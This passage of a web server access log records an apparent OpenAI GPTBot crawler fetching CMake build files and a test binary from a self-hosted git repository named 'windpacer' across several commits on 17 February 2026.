compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16050] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14307] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39744] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:15:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:15:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21643] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10224] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:15:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21647] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11825] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11264] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11193] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16920] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 